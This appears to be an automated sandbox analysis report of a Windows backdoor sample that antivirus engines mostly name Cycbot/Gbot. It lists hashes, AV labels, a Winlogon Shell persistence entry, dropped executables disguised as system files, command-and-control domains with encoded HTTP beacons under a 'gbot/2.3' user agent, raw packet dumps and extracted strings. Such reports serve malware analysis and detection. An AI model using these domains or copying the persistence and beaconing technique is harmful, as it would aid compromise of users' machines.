Analysis Date2015-01-17 13:42:15
MD56d49361163006f1a1b2501a17d872aef
SHA15f377286fde22ce4bf6182dc49964c076ddbf9b0

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 914e4038d91a6abfc61a9c5492ecd65f sha1: c9949241a70f2d0ce74fda0e51656ac8a32f0a63 size: 111104
Section.rdata md5: 57a0022ddfcfae76f8637c6665a9aa9e sha1: 29cd8fcaf07aabd1bd79211516a47e8393c62d36 size: 1024
Section.data md5: 9194d7f1052ea45eba37ee7bd99b6473 sha1: 2793eee161feeb8770ddc125506e8386b207501d size: 24064
Section.rsrc md5: 6319241d5c8741fa29e69070d561c4f1 sha1: de95a30fc845834620788159bd08642479a1456b size: 1024
Timestamp2005-10-28 13:48:12
VersionPrivateBuild: 1090
PEhashc73c9c9b295fe0eca19e76c02e690e1d3aeab898
IMPhash590c209ebfe487dd0185ee4f2ed7e31c
AV360 Safeno_virus
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Trojan.Heur.KS.1
AVAuthentiumW32/Goolbot.C.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVBullGuardGen:Trojan.Heur.KS.1
AVCA (E-Trust Ino)Win32/FakeSpypro.B!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Diple-19
AVDr. WebTrojan.DownLoader1.42758
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.IVA
AVFortinetW32/FakeAV.PACK!tr
AVFrisk (f-prot)W32/Goolbot.C.gen!Eldorado
AVF-SecureTrojan-Downloader:W32/Renos.GTC
AVGrisoft (avg)Agent.5.BJ
AVIkarusPacked.Win32.Krap
AVK7Backdoor ( 003210941 )
AVKasperskyBackdoor.Win32.Gbot.bs
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.e
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVRisingno_virus
AVSophosTroj/FakeAV-CDG
AVSymantecBackdoor.Cycbot!gen2
AVTrend MicroBKDR_CYCBOT.SME
AVVirusBlokAda (vba32)Trojan.MTA.01004

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex{C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNSzoneck.com
Winsock DNSwww.google.com
Winsock DNSdolbyaudiodevice.com
Winsock DNSmotherboardstest.com
Winsock DNS127.0.0.1
Winsock DNSzonejm.com
Winsock DNSpcdocpro.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSpcdocpro.com
Type: A
209.59.161.20
DNSwww.google.com
Type: A
173.194.37.81
DNSwww.google.com
Type: A
173.194.37.80
DNSwww.google.com
Type: A
173.194.37.84
DNSwww.google.com
Type: A
173.194.37.83
DNSwww.google.com
Type: A
173.194.37.82
DNSzoneck.com
Type: A
208.79.234.132
DNSmotherboardstest.com
Type: A
204.11.56.45
DNSzonejm.com
Type: A
23.239.15.54
DNSdolbyaudiodevice.com
Type: A
DNSxibudific.cn
Type: A
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://pcdocpro.com/images/logo-2.jpg?tq=gP4aKydeAYLu%2BYaO2jhHjYMkvJ6cJ5uw4kHXvAyZhDe5WlwW%2Fn5TGUl2qH1OKtvZ%2FMTkvFS0fW7lJi2Rv10zuDmNWwtG5VSYCC4pJ%2FO4kYJ7%2FYSHvU8vDr4wcNMN%2F6B2pMcuj4QtVRyDfNt%2FmM3PsWEokl5pEjj7b0p7l3%2FbdJdFSLwC9mPbSMw%2BVAcivYguBCGX4FDJiJyJAaBYcpracTm3YmdCpigZC8aMEpEBMYZWPAKJqdyVz1MeUgkPZHLCHsPgwrqJE%2F62qHxdPKOU%2B6M6y1ZToRJy4ZMckTeqyF9v33gb15mfmoNSZukU9IDx8M5IKqGs9yKKfW%2BMByi%2BTJ2vyRtbBzfG7M%2BrH3LWNOKPJuz4e7q4skxZkpdvbaG7ehDOGCVyMijFeGnnyemXaClYY7aa0FhWNTw6tUNGg1%2B2FnChli%2BhEq602RNi09Wgvrt1k0ZbxPEonYstgPafTkY0lyfQCJPhtwiHUqj5o5bkrhNVLujYu4niOm2sHxyhur46l%2FSns6
User-Agent: gbot/2.3
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://zoneck.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUjSsw8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GEThttp://motherboardstest.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUjSsw8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GEThttp://motherboardstest.com/images/im135.jpg?tq=gL4SK%2FSUh7zEpRMw9JGd5dGwJk6s0824xLMjS9rWwLWyxSE6qaKxpMa1C2m51bCwxLpSK%2B%2FbxUqRSfkIYUhF
User-Agent: gbot/2.3
HTTP GEThttp://zoneck.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvQj1OjbwvgS917X65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
HTTP GEThttp://zonejm.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvQj1OjbwvgS917X65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
Flows TCP192.168.1.1:1031 ➝ 173.194.37.81:80
Flows TCP192.168.1.1:1032 ➝ 209.59.161.20:80
Flows TCP192.168.1.1:1033 ➝ 173.194.37.81:80
Flows TCP192.168.1.1:1034 ➝ 208.79.234.132:80
Flows TCP192.168.1.1:1035 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1036 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1037 ➝ 208.79.234.132:80
Flows TCP192.168.1.1:1038 ➝ 23.239.15.54:80

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a                      */*....

0x00000000 (00000)   47455420 2f696d61 6765732f 6c6f676f   GET /images/logo
0x00000010 (00016)   2d322e6a 70673f74 713d6750 34614b79   -2.jpg?tq=gP4aKy
0x00000020 (00032)   64654159 4c752532 4259614f 326a6848   deAYLu%2BYaO2jhH
0x00000030 (00048)   6a594d6b 764a3663 4a357577 346b4858   jYMkvJ6cJ5uw4kHX
0x00000040 (00064)   7641795a 68446535 576c7757 2532466e   vAyZhDe5WlwW%2Fn
0x00000050 (00080)   35544755 6c327148 314f4b74 765a2532   5TGUl2qH1OKtvZ%2
0x00000060 (00096)   464d546b 76465330 6657376c 4a693252   FMTkvFS0fW7lJi2R
0x00000070 (00112)   7631307a 75446d4e 57777447 35565359   v10zuDmNWwtG5VSY
0x00000080 (00128)   43433470 4a253246 4f346b59 4a372532   CC4pJ%2FO4kYJ7%2
0x00000090 (00144)   46595348 76553876 44723477 634e4d4e   FYSHvU8vDr4wcNMN
0x000000a0 (00160)   25324636 4232704d 63756a34 51745652   %2F6B2pMcuj4QtVR
0x000000b0 (00176)   7944664e 74253246 6d4d3350 7357456f   yDfNt%2FmM3PsWEo
0x000000c0 (00192)   6b6c3570 456a6a37 62307037 6c332532   kl5pEjj7b0p7l3%2
0x000000d0 (00208)   4662644a 6446534c 7743396d 5062534d   FbdJdFSLwC9mPbSM
0x000000e0 (00224)   77253242 56416369 76596775 42434758   w%2BVAcivYguBCGX
0x000000f0 (00240)   3446444a 694a794a 41614259 63707261   4FDJiJyJAaBYcpra
0x00000100 (00256)   63546d33 596d6443 7069675a 4338614d   cTm3YmdCpigZC8aM
0x00000110 (00272)   45704542 4d595a57 50414b4a 71647956   EpEBMYZWPAKJqdyV
0x00000120 (00288)   7a314d65 55676b50 5a484c43 48735067   z1MeUgkPZHLCHsPg
0x00000130 (00304)   7772714a 45253246 36327148 7864504b   wrqJE%2F62qHxdPK
0x00000140 (00320)   4f552532 42364d36 79315a54 6f524a79   OU%2B6M6y1ZToRJy
0x00000150 (00336)   345a4d63 6b546571 79463976 33336762   4ZMckTeqyF9v33gb
0x00000160 (00352)   31356d66 6d6f4e53 5a756b55 39494478   15mfmoNSZukU9IDx
0x00000170 (00368)   384d3549 4b714773 39794b4b 66572532   8M5IKqGs9yKKfW%2
0x00000180 (00384)   424d4279 69253242 544a3276 79527462   BMByi%2BTJ2vyRtb
0x00000190 (00400)   427a6647 374d2532 42724833 4c574e4f   BzfG7M%2BrH3LWNO
0x000001a0 (00416)   4b504a75 7a346537 7134736b 785a6b70   KPJuz4e7q4skxZkp
0x000001b0 (00432)   64766261 47376568 444f4743 56794d69   dvbaG7ehDOGCVyMi
0x000001c0 (00448)   6a466547 6e6e7965 6d586143 6c595937   jFeGnnyemXaClYY7
0x000001d0 (00464)   61613046 68574e54 77367455 4e476731   aa0FhWNTw6tUNGg1
0x000001e0 (00480)   25324232 466e4368 6c692532 42684571   %2B2FnChli%2BhEq
0x000001f0 (00496)   36303252 4e693039 57677672 74316b30   602RNi09Wgvrt1k0
0x00000200 (00512)   5a627850 456f6e59 73746750 6166546b   ZbxPEonYstgPafTk
0x00000210 (00528)   59306c79 6651434a 50687477 69485571   Y0lyfQCJPhtwiHUq
0x00000220 (00544)   6a356f35 626b7268 4e564c75 6a597534   j5o5bkrhNVLujYu4
0x00000230 (00560)   6e694f6d 32734878 79687572 34366c25   niOm2sHxyhur46l%
0x00000240 (00576)   3246536e 73362048 5454502f 312e300d   2FSns6 HTTP/1.0.
0x00000250 (00592)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000260 (00608)   73650d0a 486f7374 3a207063 646f6370   se..Host: pcdocp
0x00000270 (00624)   726f2e63 6f6d0d0a 41636365 70743a20   ro.com..Accept: 
0x00000280 (00640)   2a2f2a0d 0a557365 722d4167 656e743a   */*..User-Agent:
0x00000290 (00656)   2067626f 742f322e 330d0a0d 0a          gbot/2.3....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 7134736b 785a6b70    */*....q4skxZkp
0x00000050 (00080)   60                                    `

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   342e6a70 673f7471 3d674b34 514b2532   4.jpg?tq=gK4QK%2
0x00000020 (00032)   46535568 377a4574 524d7739 594c5273   FSUh7zEtRMw9YLRs
0x00000030 (00048)   72436955 6a537377 3861336e 4f514c61   rCiUjSsw8a3nOQLa
0x00000040 (00064)   626e5673 4d4c4570 6c733072 4e613178   bnVsMLEpls0rNa1x
0x00000050 (00080)   374b6a56 6a6e616f 4c653277 64636e4b   7KjVjnaoLe2wdcnK
0x00000060 (00096)   4b375168 25324657 52343063 25324232   K7Qh%2FWR40c%2B2
0x00000070 (00112)   4e665338 736d6957 6f4e4a25 32425168   NfS8smiWoNJ%2BQh
0x00000080 (00128)   68534555 25334420 48545450 2f312e30   hSEU%3D HTTP/1.0
0x00000090 (00144)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000a0 (00160)   6f73650d 0a486f73 743a207a 6f6e6563   ose..Host: zonec
0x000000b0 (00176)   6b2e636f 6d0d0a41 63636570 743a202a   k.com..Accept: *
0x000000c0 (00192)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000000d0 (00208)   67626f74 2f322e33 0d0a0d0a            gbot/2.3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   342e6a70 673f7471 3d674b34 514b2532   4.jpg?tq=gK4QK%2
0x00000020 (00032)   46535568 377a4574 524d7739 594c5273   FSUh7zEtRMw9YLRs
0x00000030 (00048)   72436955 6a537377 3861336e 4f514c61   rCiUjSsw8a3nOQLa
0x00000040 (00064)   626e5673 4d4c4570 6c733072 4e613178   bnVsMLEpls0rNa1x
0x00000050 (00080)   374b6a56 6a6e616f 4c653277 64636e4b   7KjVjnaoLe2wdcnK
0x00000060 (00096)   4b375168 25324657 52343063 25324232   K7Qh%2FWR40c%2B2
0x00000070 (00112)   4e665338 736d6957 6f4e4a25 32425168   NfS8smiWoNJ%2BQh
0x00000080 (00128)   68534555 25334420 48545450 2f312e30   hSEU%3D HTTP/1.0
0x00000090 (00144)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000a0 (00160)   6f73650d 0a486f73 743a206d 6f746865   ose..Host: mothe
0x000000b0 (00176)   72626f61 72647374 6573742e 636f6d0d   rboardstest.com.
0x000000c0 (00192)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x000000d0 (00208)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000e0 (00224)   2e330d0a 0d0a                         .3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   352e6a70 673f7471 3d674c34 534b2532   5.jpg?tq=gL4SK%2
0x00000020 (00032)   46535568 377a4570 524d7739 4a476435   FSUh7zEpRMw9JGd5
0x00000030 (00048)   6447774a 6b367330 38323478 4c4d6a53   dGwJk6s0824xLMjS
0x00000040 (00064)   39725777 4c577978 53453671 614b7870   9rWwLWyxSE6qaKxp
0x00000050 (00080)   4d613143 326d3531 62437778 4c70534b   Ma1C2m51bCwxLpSK
0x00000060 (00096)   25324225 32466278 55715253 666b4959   %2B%2FbxUqRSfkIY
0x00000070 (00112)   55684620 48545450 2f312e30 0d0a436f   UhF HTTP/1.0..Co
0x00000080 (00128)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000090 (00144)   0a486f73 743a206d 6f746865 72626f61   .Host: motherboa
0x000000a0 (00160)   72647374 6573742e 636f6d0d 0a416363   rdstest.com..Acc
0x000000b0 (00176)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000000c0 (00192)   67656e74 3a206762 6f742f32 2e330d0a   gent: gbot/2.3..
0x000000d0 (00208)   0d0a2d41 67656e74 3a206762 6f742f32   ..-Agent: gbot/2
0x000000e0 (00224)   2e330d0a 0d0a                         .3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427651 6a314f6a 62777667 53393137   fBvQj1OjbwvgS917
0x00000040 (00064)   58363572 4a716c4c 66675069 57573163   X65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 207a6f6e 65636b2e 636f6d0d   ost: zoneck.com.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000a0 (00160)   2e330d0a 0d0a742e 636f6d0d 0a416363   .3....t.com..Acc
0x000000b0 (00176)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000000c0 (00192)   67656e74 3a206762 6f742f32 2e330d0a   gent: gbot/2.3..
0x000000d0 (00208)   0d0a2d41 67656e74 3a206762 6f742f32   ..-Agent: gbot/2
0x000000e0 (00224)   2e330d0a 0d0a                         .3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427651 6a314f6a 62777667 53393137   fBvQj1OjbwvgS917
0x00000040 (00064)   58363572 4a716c4c 66675069 57573163   X65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 207a6f6e 656a6d2e 636f6d0d   ost: zonejm.com.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000a0 (00160)   2e330d0a 0d0a742e 636f6d0d 0a416363   .3....t.com..Acc
0x000000b0 (00176)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000000c0 (00192)   67656e74 3a206762 6f742f32 2e330d0a   gent: gbot/2.3..
0x000000d0 (00208)   0d0a2d41 67656e74 3a206762 6f742f32   ..-Agent: gbot/2
0x000000e0 (00224)   2e330d0a 0d0a                         .3....


Strings

040904b0
1090
B&reak
C&ompile
&Data
MS Sans Serif
PrivateBuild
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
_135C~s%
%257%l
2ccC&X
2cTNc_
2+gXdX
6DX6.+heX
6:TU-Q
6%X'X5
7Gvb5J#iM
7toJ?Zb
<8uSSLl
)9J<jy
9=\L%X
?AfF>/
}A(rt/
."Bbd>t
BBHcH]M
{bk8yF8ns
BwNfIU
c2Y_j>0
#,c3\+2
cc'j>-
cc-,L&X|
CfG[~y
cj7c&X
CloseHandle
CreateEventA
CreateSemaphoreA
CreateStdAccessibleObject
CreateThread
cXs@\v%>A
cYc/4n
@.data
DeleteCriticalSection
:DS(HHb
*}dXFX
dXin.V
	dX.~{q
dX[WY`
\DX&X[j
DXXl<a
EnterCriticalSection
EnumResourceNamesA
<*>EX~
\}EX[1
EXFX*Z
ExitProcess
eX{T58
eXv$X]
EX;=Zr
FindClose
FindFirstFileW
FreeEnvironmentStringsA
FX<4	r
FXgX}I
FXH$XQ
FXK9FX
fX[{[n
}FXti@
FX|V67
FXv^GX)z
fXVJGX
_fX~'X
fX'X/;
fX'X[u
FX$X%X
GetDriveTypeW
GetLastError
GetLocalTime
GetStartupInfoA
GetSystemTimeAsFileTime
GetThreadPriority
g&/s@?
gX8'XJ
gXDXZfX 
gXfXu"
gXfXw 
gXfX$X
-GXiEXYI
[gX<uu
{-gX.v
^GX'X(]
GX.&X3
/GX&XT
&] H9Sv
+Hb'p>
hFhJ|@
	hJ4Up
HjgXVGX
hLibrhO
iEXfXW(
InitializeCriticalSection
'io	x4
	itx{c
IWN&XEX
j?>6b;
JeX%XJS
j`O^kl
	Jq/,8[
jYjz|2
KERNEL32.dll
kfX&Xj/B
kGXdXt
klofXw
kx:;.i}c
,L5dId
=LcZP{~
LeaveCriticalSection
l<;fXdXZ
[lFXpbe
}>l*gX
]lgX{s
lm,N(b
LoadLibraryA
LresultFromObject
l&X9(`
LXmN6N
MFX|-&X
|MGXdX\I2
&M~}H@p
*,MvAw
*MYdXm*
n*DXfX
nWJoDXGX
OLEACC.dll
O%X_\}t-
> (PO5
Q.Ib	W>
`.rdata
ReadFile
ReleaseSemaphore
R%j;s;
SBc7YfX
S"eK\. 
SetEndOfFile
SetEvent
SetFilePointer
sUNDau
S.vn7W
>;t\||
T2/"O?E
TdC1s6c
!This program cannot be run in DOS mode.
thL%@.
ThlFre
tytw	8
U4EX%Xq
ucc!7q
UeX%Xr
uThlAllh']@
V*eX|gX1
VI(RI;
>))VlA
V$:xF]
v'Xx;+<_gXW
WaitForMultipleObjects
WaitForSingleObject
w?\<gb
WHwDXdX
w{n:?2F#
WriteFile
W.uHleX
/wWDXp
}W/'Xa
w[;'Xk
W'XmK5
%X>5::'X
X7\lVz
X8fX?9
X8>o+Y
*(xdX7
&XdX/EX
XDXeX;`
&X-DXGXi
XdXhz^
XdXXGX
XdX	&XX
X-<EX/
XeX5y?dX
XEXEX#
XeX-Hn
&XeXH>xDX
$X~eXI	
X?EXkc
X^eX,}_L
xEXx-0
XfX5^,
X:-FXGX;
XFXGXT
XFX^%Xk0
XfX<xw
XFXyDX=
XfXz.7%XW
XGXFX=
XhgXEXc
%XhhLocahM
&Xh(+n\
XH'XldX
&XIWeX>2
XJ\DX;=
XjDX6FX
Xj~eX#
XJ('Xu
$X<:L[
XL4M$X[a
XLL~_'X
XlTdX$X_Jy_
X|MHhXh
Xm||$X
XNeXk-
X*NOY@
XTFhzM@
XT^h8x@
Xt'X%XI
%Xu*&X
Xu%XNDX
XvhEXeX
$X{vn*
X,v%X(9
%XwEXI
^	$X&X>!
(+&X'X\
X?$X-1
X$X5eX
X|%XeX
X/&XFX
X'XgXc
X-$XgXI
X'XgX*p
X%X)jM
XxL.U*xt
X'Xm5,\GX
X&XMEX
X'X/U&X
X&X'X-
XykfX\
Xyn5h]
X,yNvo
Xy%X$X
.Xz8]KIxC
XZEX5T
XztFX|
Ycc7Cc
"Y'CIN0
YDXMxfX
yEXfX\
_-Y'H!
=Y<ip+
YISci-UX
YobBV0
yv$--;a
:Y^w,!
]:ZDXL
z`i8rc
^Z;l;iGX
zNOvv	
{ZXZ^}_